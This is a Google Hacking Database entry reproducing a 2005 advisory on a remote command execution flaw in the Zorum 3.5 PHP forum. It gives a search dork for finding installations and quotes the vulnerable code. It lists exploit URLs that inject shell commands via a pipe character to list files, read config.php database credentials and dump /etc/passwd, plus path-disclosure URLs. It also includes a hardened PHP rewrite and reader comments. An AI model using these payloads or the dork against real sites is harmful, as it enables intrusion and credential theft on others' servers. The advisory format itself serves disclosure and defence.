GHDB « Hackers For Charity


Google Search: "Powered by Zorum 3.5"

rgod rates this entry 8 out of 10.
Submitted: 2005-08-18 00:00:00
Added by: rgod
Hits: 1453
Score: 8

Zorum 3.5 remote code execution poc exploit

software:
description: Zorum is a freely available, open source Web-based forum application implemented in PHP. It is available for UNIX, Linux, and any other platform that supports PHP script execution.
author site: http://zorum.phpoutsourcing.com/

1) remote code execution:

vulnerable code, in /gorum/prod.php file:

    $doubleApp = isset($argv[1]);
    …
    if( $doubleApp )
    {
        $appDir = $argv[1];
        system("mkdir $prodDir/$appDir");
    …

a user can execute arbitrary commands using pipe char, example:

http://[target]/zorum/gorum/prod.php?argv[1]=|ls%20-la
to list directories

http://[target]/zorum/gorum/prod.php?argv[1]=|cat%20../config.php
to see database username/password…

http://[target]/zorum/gorum/prod.php?argv[1]=|cat%20/etc/passwd
to see /etc/passwd file

2) path disclosure:

http://[target]/zorum/gorum/notification.php
http://[target]/zorum/user.php
http://[target]/zorum/attach.php
http://[target]/zorum/blacklist.php
http://[target]/zorum/forum.php
http://[target]/zorum/globalstat.php
http://[target]/zorum/gorum/trace.php
http://[target]/zorum/gorum/badwords.php
http://[target]/zorum/gorum/flood.php
and so on…

googledork:
"Powered by Zorum 3.5"

rgod
site: http://rgod.altervista.org
mail: retrogod at aliceposta it
original advisory: http://rgod.altervista.org/zorum.html


Comments:

2005-09-18 16:12:45 (wizel): in every one i tried:

Warning: fopen(t3.txt): failed to open stream: Permission denied in /usr/local/src/zorum_3_5/gorum/prod.php on line 78

Warning: file(t2.txt): failed to open stream: No such file or directory in /usr/local/src/zorum_3_5/gorum/prod.php on line 79

Warning: fclose(): supplied argument is not a valid stream resource in /usr/local/src/zorum_3_5/gorum/prod.php on line 83

Warning: file(t3.txt): failed to open stream: No such file or directory in /usr/local/src/zorum_3_5/gorum/prod.php on line 84

Warning: file(t1.txt): failed to open stream: No such file or directory in /usr/local/src/zorum_3_5/gorum/prod.php on line 91
Vege


2005-10-06 22:45:57 (rgod): this requires that “register_globals” is enabled and “register_argc_argv” is disabled and obviously, safe mode off.
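
A hardened form of the prod.php excerpt from the advisory, as an added example that is not Zorum's or rgod's code: it refuses to run outside the CLI, reads arguments from $_SERVER['argv'] instead of a global that register_globals can fill from the request, validates the name against an allow-list, and creates the directory without a shell. The $prodDir value, the safeAppDir() helper and the name pattern are assumptions made for illustration.

```php
<?php
// Added example: hardened form of the prod.php excerpt (not Zorum's own code).
// $prodDir's value and the name pattern are assumptions made for illustration.

// 1. prod.php is a command-line helper; refuse to run under a web SAPI so a
//    request-supplied "argv" can never reach the code below.
if (PHP_SAPI !== 'cli') {
    http_response_code(404);
    exit;
}

/**
 * Return a safe application directory name, or null if the input is rejected.
 * Allow-list: letters, digits, underscore, hyphen; 1 to 64 characters.
 */
function safeAppDir($candidate): ?string
{
    if (!is_string($candidate)) {
        return null;            // e.g. an array injected through the request
    }
    return preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $candidate) === 1
        ? $candidate
        : null;
}

// 2. Take arguments from the interpreter, not from a global variable that
//    register_globals could have populated from the query string.
$args = $_SERVER['argv'] ?? [];
$prodDir = __DIR__ . '/prod';   // assumed location

if (isset($args[1])) {
    $appDir = safeAppDir($args[1]);
    if ($appDir === null) {
        fwrite(STDERR, "invalid application directory name\n");
        exit(1);
    }
    // 3. Create the directory with the filesystem API; no shell is involved,
    //    so "|", ";" and similar characters have no special meaning.
    $target = $prodDir . '/' . $appDir;
    if (!is_dir($target) && !mkdir($target, 0755, true)) {
        fwrite(STDERR, "could not create $target\n");
        exit(1);
    }
}
```

Keeping command-line helpers such as this one outside the web root removes the exposure regardless of PHP configuration.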



5 Responses to “GHDB”

  1. Jack says:

    Does GHDB still update now?

  2. Johnny says:

    The GHDB is alive and well, updated through the ExploitDB: http://www.exploit-db.com/google-dorks.

  3. The Artist says:

    Hi Johnny, been a while since I’ve come last. Aren’t you gonna update this website anymore???

  4. Johnny says:

    The GHDB is not updated and lives with the exploitdb: http://www.exploit-db.com. Please check out the awesome folks at Offensive Security as well: http://www.offensive-security.com!

  5. Velmurugan says:

    Are any offline viewable resources available for this product?
